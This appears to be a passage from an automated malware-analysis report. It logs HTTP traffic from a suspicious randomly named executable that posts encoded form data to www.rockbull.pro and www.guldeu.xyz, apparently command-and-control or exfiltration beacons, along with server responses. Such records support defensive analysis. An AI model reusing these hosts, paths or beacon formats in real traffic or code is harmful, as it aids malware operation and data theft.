                                                                                                  Oct 21, 2024 13:15:39.192616940 CEST121INData Raw: 08 34 ff f9 98 d6 ff 2f 8c 0d d0 5b 40 2d 18 38 90 2d 30 30 df c1 90 36 8c f6 a2 34 63 8b de c6 b5 93 cf 25 c3 f0 8d ca f7 6d ad 66 e1 d9 ba 76 4a ba 36 8d 7d fb a0 42 ec 84 d9 b4 cf 5c d7 0b af 57 b2 64 e0 c1 bb 5b d6 e2 ff 01 3d 45 6d 85 8e 18
                                                                                                  Data Ascii: 4/[@-8-0064c%mfvJ6}B\Wd[=Em~BOy9.-C%5]n?


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  5192.168.2.2249172185.174.173.22801564C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 21, 2024 13:15:40.614125967 CEST2472OUTPOST /0804/ HTTP/1.1
                                                                                                  Host: www.rockbull.pro
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Origin: http://www.rockbull.pro
                                                                                                  Content-Length: 3629
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Referer: http://www.rockbull.pro/0804/
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
                                                                                                  Data Raw: 6f 30 49 38 62 4a 57 68 3d 32 65 34 5a 43 77 64 78 65 44 36 41 66 6b 53 41 68 52 43 5a 46 34 5a 47 63 55 47 68 46 36 43 58 32 72 39 69 59 2b 72 65 6a 43 4b 66 71 53 51 34 74 35 47 76 47 35 38 34 68 57 7a 4f 6f 32 69 58 30 51 57 4e 63 41 2f 44 67 41 64 5a 7a 38 34 48 71 69 78 52 59 71 62 74 43 65 44 44 6a 5a 57 61 66 67 69 4a 5a 37 30 70 66 30 62 35 65 77 53 37 44 6a 47 63 41 67 65 4b 32 2b 6c 65 50 6b 58 6a 6c 44 32 4f 51 6a 6d 62 49 4b 54 30 63 5a 6d 62 34 41 59 5a 7a 49 6f 70 38 39 76 58 6a 70 79 6b 6b 43 45 62 76 45 70 4a 70 6d 31 36 63 65 67 6b 33 73 50 4d 70 56 62 71 30 71 41 51 50 46 65 34 48 53 68 63 6d 61 69 44 38 70 37 73 68 6e 41 2b 79 50 71 54 67 41 68 74 50 63 32 6f 4f 45 49 47 2f 63 6e 58 75 46 68 67 30 6b 33 7a 58 36 44 47 4d 75 57 51 6c 4c 6e 36 61 75 41 42 4a 6c 4d 38 4c 4b 6f 55 69 65 64 49 6b 44 61 36 47 44 78 74 7a 70 38 5a 78 53 2b 62 4a 50 7a 47 64 74 55 61 38 62 62 35 63 74 78 66 6f 4a 58 64 4d 50 6b 50 75 66 36 4e 37 36 41 4c 70 5a 70 50 69 4b 59 6e 32 31 5a 6e 79 33 4b 69 6d [TRUNCATED]
                                                                                                  Data Ascii: o0I8bJWh=2e4ZCwdxeD6AfkSAhRCZF4ZGcUGhF6CX2r9iY+rejCKfqSQ4t5GvG584hWzOo2iX0QWNcA/DgAdZz84HqixRYqbtCeDDjZWafgiJZ70pf0b5ewS7DjGcAgeK2+lePkXjlD2OQjmbIKT0cZmb4AYZzIop89vXjpykkCEbvEpJpm16cegk3sPMpVbq0qAQPFe4HShcmaiD8p7shnA+yPqTgAhtPc2oOEIG/cnXuFhg0k3zX6DGMuWQlLn6auABJlM8LKoUiedIkDa6GDxtzp8ZxS+bJPzGdtUa8bb5ctxfoJXdMPkPuf6N76ALpZpPiKYn21Zny3Kimxub6HFVXZgW2PyQg91JyV9fC4gKGUEq69D5mIDSRYWY/YKhMPlLgwVvjng/4U6f+JLENLoKXn8qaHk+aycTPHg61vcBo5ezJVcjbAEbh+7pySsT9/4aESTIqvGuKsqpN6Ct8CAcY0Wiiey3akuK701dWyrbEIX4t2i4qCOdN+mBLk/UYIr6hdeD8Vht/vVS6LSYmVTQBOCK6RZj7zinYxELEnWFfHxzGueOlCsNi6zQAMcOTKpYCBJPG2jE2eAAFnZGfb5w9uzJUfgYzWz5ZaNrtRe02ykpdiRLAzl2U8AiJobb0SWBLrEduxanTIeGsnaL6r4UismnWtE9aAoUwQqI4l46E4pF7ks/7Ors5t5yAmW+m6NMoecdNwcTnawfU3LS9ZJDRiufRZw1GiiS1liu91vlup5aQGbyi+qUpJZcrhBlp/45xlkTpTiwqPrIYiCTNGh9U9+jvW/0UIl64rN9Ds7bDrLMOTBpgVCcs7haihk5jbKtejwjWJGbWYH7xoxB0OfJ1lccTd4WJT6U4lfe4gXfcPlN/ODzSc+0Ak8LeqhY+JuEumQRMgGu8fcfIxNDB2r8MVBzFbf9BFt7GUDzG1Lkd4npEbMnKKdwjqUBNF4o4drAx1hg0VmlBMtj/KlIwHo/VoQyjUz27s/zuCAoCXyMypdDQKm [TRUNCATED]
                                                                                                  Oct 21, 2024 13:15:40.619643927 CEST1681OUTData Raw: 67 44 47 4a 66 62 30 31 57 2b 64 2b 67 44 6a 48 37 77 62 4a 67 51 5a 46 61 6c 65 7a 51 68 41 70 6a 67 53 38 2b 71 47 42 36 67 44 35 62 4b 45 4d 50 66 59 6d 70 7a 76 4d 6b 63 70 37 44 67 69 77 42 65 56 77 75 59 45 57 79 43 63 41 56 55 6f 33 71 39
                                                                                                  Data Ascii: gDGJfb01W+d+gDjH7wbJgQZFalezQhApjgS8+qGB6gD5bKEMPfYmpzvMkcp7DgiwBeVwuYEWyCcAVUo3q98psTuxNZ/urger0DxhRKwsbS0L9aaVhehV1hOC83jhpdyJhucWr1gOxUE9VNLUNvTk4KFIDR9SxIjuQnXK2W9mmlGyhCUNC1/nxB1ZhMY6MDHsIHQc0sO8/KaWcTH7TrA+1sDbwUjfNxfZJwXoYEzTTCPnOgFYoQW
                                                                                                  Oct 21, 2024 13:15:41.661010027 CEST1236INHTTP/1.1 404 Not Found
                                                                                                  Connection: close
                                                                                                  x-powered-by: PHP/8.1.29
                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                  link: <https://rockbull.pro/wp-json/>; rel="https://api.w.org/"
                                                                                                  transfer-encoding: chunked
                                                                                                  content-encoding: gzip
                                                                                                  vary: Accept-Encoding
                                                                                                  date: Mon, 21 Oct 2024 11:15:41 GMT
                                                                                                  server: LiteSpeed
                                                                                                  Data Raw: 61 37 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bc 19 db 6e db 38 f6 b9 f9 0a 9a 0f b6 38 d5 2d 4e 93 14 76 94 6e a7 ed 0c 66 d1 d9 0e 7a c1 62 11 07 0b 9a 3a 92 99 4a a4 96 a4 ec 18 ae ff 7d 41 4a 8e 65 3b 33 db d9 8e 1b 04 88 78 78 78 ee 37 32 57 bd d7 ef 5e 7d fc d7 6f 6f d0 cc 94 c5 f5 c9 95 fd 83 0a 2a f2 04 83 c0 d7 27 27 57 33 a0 e9 f5 09 42 08 5d 95 60 28 62 33 aa 34 98 04 7f fa f8 53 f0 1c a3 a8 bb 29 68 09 09 9e 73 58 54 52 19 8c 98 14 06 84 49 f0 82 a7 66 96 a4 30 e7 0c 02 b7 f0 11 17 dc 70 5a 04 9a d1 02 92 d3 30 de 23 56 29 59 81 32 cb 04 cb 7c c4 4b 9a 43 87 60 b4 a8 82 96 7a 54 57 85 a4 a9 8e 86 f1 70 18 c5 e7 d1 4c 96 50 d1 1c 02 2b 3b a8 80 97 79 58 89 1c 1f 4a aa e4 54 1a dd 21 2b 24 17 29 dc fb 48 c8 4c 16 85 5c e0 8d 7e 86 9b 02 ae df 4b f6 79 5a 17 05 0a d0 bb 2c e3 8c d3 e2 2a 6a b6 1a 1b f5 82 00 65 52 98 80 2e 40 cb 12 10 0a 82 96 af 66 8a 57 06 69 c5 12 1c 86 51 f3 fb 99 9b d0 e2 b7 e8 21 93 65 34 4d d9 f3 67 10 5f 9e 4e c3 3b 2b 9c 92 5a 4b c5 73 2e 12 4c 85 14 cb 52 d6 1a 5f [TRUNCATED]
                                                                                                  Data Ascii: a71n88-Nvnfzb:J}AJe;3xxx72W^}oo*''W3B]`(b34S)hsXTRIf0pZ0#V)Y2|KC`zTWpLP+;yXJT!+$)HL\~KyZ,*jeR.@fWiQ!e4Mg_N;+ZKs.LR__ER\|FTq&F3Y[Tg@d$"Y=XLfC4(MtK@+a-yL~h<q<>-q*.tgq6)UA^,3lF665q`tRmB5n%k "E",Z)d. z*d)'CSZ Cs&(@?;WK>5byIA@t;08=nX-H"LoJA_CPd`K,WUgUy]0gN|$`^S!=&EjH~`S]4kPbk`ksTRaAA_wlNMtGty7
                                                                                                  Oct 21, 2024 13:15:41.661076069 CEST1236INData Raw: 63 b8 c8 35 4a d0 0a 4f a9 86 4f aa c0 23 dc 04 c3 24 9a 44 3a 5c 84 52 e5 93 c8 15 20 3d 89 98 54 30 89 dc e1 49 74 7a 1e c6 e1 d9 24 ba 1c de 5f 0e 27 11 f6 31 dc 1b 3c c2 ae 72 f9 58 cf f3 ff 8f 9e 9e e7 8e 9a 9e e7 6f 1a 82 7a 9e 63 1f 6b 59
                                                                                                  Data Ascii: c5JOO#$D:\R =T0Itz$_'1<rXozckY+xLFwdZvbK,SN;;((jp~_A%E8$>F/qhmdEMzd5I_0Z=t]#/AZV#o$wGcZs)>h?G"
                                                                                                  Oct 21, 2024 13:15:41.661127090 CEST1236INData Raw: cb 17 6f 8f a9 47 7c 0f ac 65 dc 2c fd e5 cb 6a 4d c2 ce 34 fd c2 d8 f1 6c 3b 5d 93 11 84 ed 65 a1 df 87 d0 2c 5c 1d ed f7 3d 8b d7 ae 88 6f 17 2d 16 21 64 4d c8 da f3 9a ab 86 9f 4a e6 ee 6a c4 ff 9d bb 07 b1 13 37 ba bd bd b6 83 f5 f6 f6 75 e5
                                                                                                  Data Ascii: oG|e,jM4l;]e,\=o-!dMJj7u`Q@:i=hG.y}{ZT.yK;V'O#A=^3>yd*UjpuMf~S(AQghs1BAa+YQ*xW5}W6/0
                                                                                                  Oct 21, 2024 13:15:41.661161900 CEST1236INData Raw: 43 0f fe 33 97 5c ea e5 a2 ec 14 9e e3 2c 25 b9 42 9c 88 f3 21 b7 c1 76 29 9d a4 23 a0 b9 13 cc f1 f7 fd 2a d0 dc 4f 0e d0 5d 4c 20 2a 1e 7a d8 ee 03 7f 6f e9 19 72 63 5a e2 94 06 d4 e9 ae 91 66 50 ca 60 83 f5 8e 0c d8 b3 3f 84 dd 94 a6 b6 6b c8
                                                                                                  Data Ascii: C3\,%B!v)#*O]L *zorcZfP`?k9-d%`wo1<_IZM7&XJc+becfn1[,0F_O%!Q'5w3+9bbN:^FjI=0fD|EP0Ni
                                                                                                  Oct 21, 2024 13:15:41.661190987 CEST194INData Raw: 4c e3 96 6a 8a 0f 7f d2 3c 0d bc c6 a6 09 35 89 59 46 4d c0 d7 58 a5 2d 55 cc b2 43 8b a8 61 fe 5e 64 98 45 fb 1d ae 97 b3 2c 35 fc 01 be 12 4a c3 55 dd bd a0 b8 30 8b aa 85 a4 61 52 49 5a d5 12 66 d1 d4 30 1a 8e 76 d5 60 16 4f 1b 4a c3 55 d6 0d
                                                                                                  Data Ascii: Lj<5YFMX-UCa^dE,5JU0aRIZf0v`OJUf |U7 U.W_^^b0W :JOWT.n@,4};;lfu5r.jA-w_f:bkt
                                                                                                  Oct 21, 2024 13:15:41.670401096 CEST1236INData Raw: 62 63 32 0d 0a cc 5d 6d 6f 1b 37 12 fe 2c fd 0a 56 85 0f 0d 5a ee 6a 65 d9 56 1c 45 6d 2e 0d 7a 05 ae b9 6b da 5e af 9f 84 5d ed 4a 62 ba 6f d8 5d 39 f6 05 01 6c a5 bd 17 b8 68 d1 de b7 bb a2 77 3f c1 71 a3 ab 9a c4 ca 5f 20 ff d1 61 86 dc 15 f5
                                                                                                  Data Ascii: bc2]mo7,VZjeVEm.zk^]Jbo]9lhw?q_ ab9 Kp8pgV5|Go0XQW3+W,{m[uwZq]g{2%S6U9(juvp_n6;}u4ay@L:};;;/
                                                                                                  Oct 21, 2024 13:15:41.670464039 CEST1236INData Raw: 8d 38 8a 07 31 75 b2 b0 5d 33 ee 0e d2 8c 75 0f f2 73 7e 54 6e 94 5c ce c8 0c d1 5d 62 a9 ba 01 8a 98 05 3d da f5 07 cc 35 1c 3b 84 4e 73 93 28 56 c8 c2 73 8f e1 53 f3 fd b1 75 ee 60 98 1b 36 6a d4 e8 6d 50 f4 0b 15 52 f1 1e ee 12 45 e1 2f db 09
                                                                                                  Data Ascii: 81u]3us~Tn\]b=5;Ns(VsSu`6jmPRE/2Sn^Q@R;`[qn>AcOG xi[ du0F4bE()#hK(exPmQmoY6]@BiMSQ4CHVAp9tXMN_~
                                                                                                  Oct 21, 2024 13:15:41.670496941 CEST424INData Raw: e2 1b c2 7f e2 13 7e 2a 1e 8a 21 5c 3b e1 4f c4 11 1f f3 67 6f 11 28 7b 24 0e f9 84 3f 81 59 f0 5b 04 67 c2 8f f8 44 0c f9 89 f8 5a fc 83 8f f9 cf 84 3f e7 13 f8 38 11 87 62 c8 cf c4 b7 30 a5 e3 4f f8 84 ff 0c 0f cc 4f a1 e1 f2 42 9c 61 77 bb cc
                                                                                                  Data Ascii: ~*!\;Ogo({$?Y[gDZ?8b0OOBawgv}f9{#?"3>C`FNqXTZ=C>|,WB3~GoO!|:C) cOCGX$DE#+(9c>|,
                                                                                                  Oct 21, 2024 13:15:41.670530081 CEST121INData Raw: 08 34 ff f9 98 d6 ff 2f 8c 0d d0 5b 40 2d 18 38 90 2d 30 30 df c1 90 36 8c f6 a2 34 63 8b de c6 b5 93 cf 25 c3 f0 8d ca f7 6d ad 66 e1 d9 ba 76 4a ba 36 8d 7d fb a0 42 ec 84 d9 b4 cf 5c d7 0b af 57 b2 64 e0 c1 bb 5b d6 e2 ff 01 3d 45 6d 85 8e 18
                                                                                                  Data Ascii: 4/[@-8-0064c%mfvJ6}B\Wd[=Em~BOy9.-C%5]n?


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  6192.168.2.2249173185.174.173.22801564C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 21, 2024 13:15:43.153520107 CEST471OUTGET /0804/?o0I8bJWh=7cQ5BE5RBCqgXF7xrBGoHohDXivjQLfe2KgDJ9LuiE6tpBU04a3sAbwq5Q7Yjj3JjwmtcjT9zhxyx84N9Ed0ZJTtf47MgLeYfgSXfectTV2gRR6PHDayMxuKrOIC&IzCDX=JREpwHC8S HTTP/1.1
                                                                                                  Host: www.rockbull.pro
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
                                                                                                  Oct 21, 2024 13:15:44.221621037 CEST500INHTTP/1.1 301 Moved Permanently
                                                                                                  Connection: close
                                                                                                  x-powered-by: PHP/8.1.29
                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                  x-redirect-by: WordPress
                                                                                                  location: http://rockbull.pro/0804/?o0I8bJWh=7cQ5BE5RBCqgXF7xrBGoHohDXivjQLfe2KgDJ9LuiE6tpBU04a3sAbwq5Q7Yjj3JjwmtcjT9zhxyx84N9Ed0ZJTtf47MgLeYfgSXfectTV2gRR6PHDayMxuKrOIC&IzCDX=JREpwHC8S
                                                                                                  content-length: 0
                                                                                                  date: Mon, 21 Oct 2024 11:15:44 GMT
                                                                                                  server: LiteSpeed


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  7192.168.2.2249174162.0.238.246801564C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 21, 2024 13:15:57.576988935 CEST2472OUTPOST /qd68/ HTTP/1.1
                                                                                                  Host: www.guldeu.xyz
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Origin: http://www.guldeu.xyz
                                                                                                  Content-Length: 2165
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Referer: http://www.guldeu.xyz/qd68/
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
                                                                                                  Data Raw: 6f 30 49 38 62 4a 57 68 3d 50 4f 4d 58 67 67 6c 4c 6b 47 47 46 34 61 68 4e 55 4a 6e 4c 31 7a 52 72 48 42 48 4b 59 30 77 31 58 6f 4a 33 46 64 55 6f 6a 76 70 4b 67 32 75 45 39 73 4a 6f 43 55 42 62 4b 70 49 66 46 5a 34 47 34 42 51 70 76 61 61 67 36 41 65 44 6c 30 39 30 53 41 45 61 37 2b 39 39 66 4e 50 67 6d 37 44 54 46 34 59 6d 79 30 6d 30 59 2b 67 6f 74 68 79 39 48 4d 58 62 67 6b 30 37 55 65 39 36 48 4d 7a 75 57 46 46 36 66 38 78 5a 71 77 2f 76 32 4b 59 59 33 4f 47 31 32 31 4e 48 4f 4b 2b 55 44 41 39 51 4b 76 68 68 54 77 58 6f 67 6d 4d 6a 53 76 79 35 7a 7a 38 4e 67 2f 57 50 45 55 53 6e 46 67 55 64 78 77 6d 4e 6b 6a 50 75 6b 7a 49 45 38 4b 41 4a 74 61 70 4c 51 58 49 59 6c 39 39 31 4d 6c 63 74 56 31 4c 5a 49 31 53 4b 73 6d 30 61 4b 34 51 4e 67 66 68 68 67 63 4d 4a 59 43 54 31 59 4e 79 4a 75 43 4f 71 78 66 36 32 6c 33 45 70 6f 35 44 35 64 48 6a 6f 43 4c 31 2b 64 4e 2b 42 58 66 4b 36 79 31 48 30 6e 6d 6d 65 42 49 64 66 37 63 6a 62 50 66 41 78 67 31 50 36 52 43 53 64 77 55 41 79 43 36 6d 31 2b 43 58 48 63 [TRUNCATED]
                                                                                                  Data Ascii: o0I8bJWh=POMXgglLkGGF4ahNUJnL1zRrHBHKY0w1XoJ3FdUojvpKg2uE9sJoCUBbKpIfFZ4G4BQpvaag6AeDl090SAEa7+99fNPgm7DTF4Ymy0m0Y+gothy9HMXbgk07Ue96HMzuWFF6f8xZqw/v2KYY3OG121NHOK+UDA9QKvhhTwXogmMjSvy5zz8Ng/WPEUSnFgUdxwmNkjPukzIE8KAJtapLQXIYl991MlctV1LZI1SKsm0aK4QNgfhhgcMJYCT1YNyJuCOqxf62l3Epo5D5dHjoCL1+dN+BXfK6y1H0nmmeBIdf7cjbPfAxg1P6RCSdwUAyC6m1+CXHct6V06kPdWFqPNfh7TQ9M46pbuz9ps8kPK4iQKMJJC8mFslMFL6jxphdvsevHf3ZX15/C0sWMnBi/TAVBfq7SPdqDOgjnCeJ6+2tTxRIdGeLpiEw8Ip8FxbzaIyNVrXSg17H1F6k1RyVTZMrPCztXha92d7I+HroAZi3JRCPkXS/w3/4YdlBTIUSzBTSkYGP3axU2twlq/RLgbQKk1yj5L+OyEQ1ud82tvrJHsp5Q6GIrvWG82yKLBS7UumQMDe/fAkkv9MNA5JMELmHxZa3nlqJunnr3+lSRlsvdgcsNqy8jfK5HmucMxxLDfeUTzBLAK97dLoIkCd6tsAKwQMRQqZUSL5045DOIUogHDbhj9NkSYnMZMtHT+jVBGlB6kO32K67hcFKfvfgLTz3x9ULarfiKcECsacH0RGjbSd8OvB13L5QSse1FatyLwG1lAByIB6bSMrCu0GY0lQ3uS88qi9NQB3sIwlYQ5j1KJfsH+Qbym4Ele0NAVGQEZQihVPtf5shAzr2j9E5uk/5f+RUm4UObLISY8/p/mkuo3qjpr3xppczprW/WRMLWbp/ZYOkFesqnSGywcSOzP+oYkbipo3ev/D6V3UQEjP8i5ABAsHDTyWKGqYcuam/f0bBkW2Qt8cwMHM0LL8GPOhNAl2Cw5crzpFHC6e/vJR [TRUNCATED]
                                                                                                  Oct 21, 2024 13:15:57.582706928 CEST211OUTData Raw: 38 4a 38 45 46 4e 32 47 31 59 63 79 6d 69 75 45 66 2b 36 44 35 4d 74 54 6d 2f 41 6d 4d 51 4a 6f 62 59 47 46 7a 51 79 69 65 70 65 79 45 61 69 2b 61 35 66 6a 2f 2b 78 50 79 4a 6e 38 6a 75 43 7a 71 6f 6d 6f 76 71 36 56 38 39 4e 6d 38 76 55 65 61 6c
                                                                                                  Data Ascii: 8J8EFN2G1YcymiuEf+6D5MtTm/AmMQJobYGFzQyiepeyEai+a5fj/+xPyJn8juCzqomovq6V89Nm8vUealpc6sHsSQJ2uhcayHy1O08fcMb6Es10/O5C1JiGZS0gDa8FPfO3nWaJkrP20nfneqGnQOs4nGADwFYK56PSjZKl6cDivYdrw0vfKo4QoWUlcaDISKp3UgbeIoplkXyPkZ7
                                                                                                  Oct 21, 2024 13:15:58.274892092 CEST533INHTTP/1.1 404 Not Found
                                                                                                  Date: Mon, 21 Oct 2024 11:15:58 GMT
                                                                                                  Server: Apache
                                                                                                  Content-Length: 389
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  8192.168.2.2249175162.0.238.246801564C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 21, 2024 13:16:00.138528109 CEST722OUTPOST /qd68/ HTTP/1.1
                                                                                                  Host: www.guldeu.xyz
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Origin: http://www.guldeu.xyz
                                                                                                  Content-Length: 205
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Referer: http://www.guldeu.xyz/qd68/
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
                                                                                                  Data Raw: 6f 30 49 38 62 4a 57 68 3d 50 4f 4d 58 67 67 6c 4c 6b 47 47 46 34 5a 35 4e 55 59 6e 4c 33 54 52 72 45 42 48 4b 4b 30 77 7a 58 6f 46 4a 46 66 34 34 69 5a 70 4b 67 6e 65 45 39 66 74 6f 50 30 42 59 46 4a 49 62 62 70 35 45 34 42 52 56 76 65 61 67 36 41 4b 44 33 6d 31 30 62 69 73 5a 35 4f 39 2f 57 74 50 6c 6d 37 2b 7a 46 34 46 34 79 31 4f 30 59 34 41 6f 2f 78 43 39 43 71 44 62 77 6b 30 39 53 65 39 74 48 4d 76 33 57 45 31 45 66 38 4e 5a 71 6c 44 76 32 61 34 59 79 5a 71 31 76 46 4e 47 47 71 2f 72 44 7a 59 63 44 2b 39 50 51 42 33 66 69 6c 4d 67 4e 73 69 4d 32 51 38 7a 6a 64 65 31 4c 79 7a 77 44 54 78 5a 69 67 3d 3d
                                                                                                  Data Ascii: o0I8bJWh=POMXgglLkGGF4Z5NUYnL3TRrEBHKK0wzXoFJFf44iZpKgneE9ftoP0BYFJIbbp5E4BRVveag6AKD3m10bisZ5O9/WtPlm7+zF4F4y1O0Y4Ao/xC9CqDbwk09Se9tHMv3WE1Ef8NZqlDv2a4YyZq1vFNGGq/rDzYcD+9PQB3filMgNsiM2Q8zjde1LyzwDTxZig==
                                                                                                  Oct 21, 2024 13:16:00.784848928 CEST533INHTTP/1.1 404 Not Found
                                                                                                  Date: Mon, 21 Oct 2024 11:16:00 GMT
                                                                                                  Server: Apache
                                                                                                  Content-Length: 389
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  9192.168.2.2249176162.0.238.246801564C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 21, 2024 13:16:02.673089027 CEST2472OUTPOST /qd68/ HTTP/1.1
                                                                                                  Host: www.guldeu.xyz
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Origin: http://www.guldeu.xyz
                                                                                                  Content-Length: 3629
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Referer: http://www.guldeu.xyz/qd68/
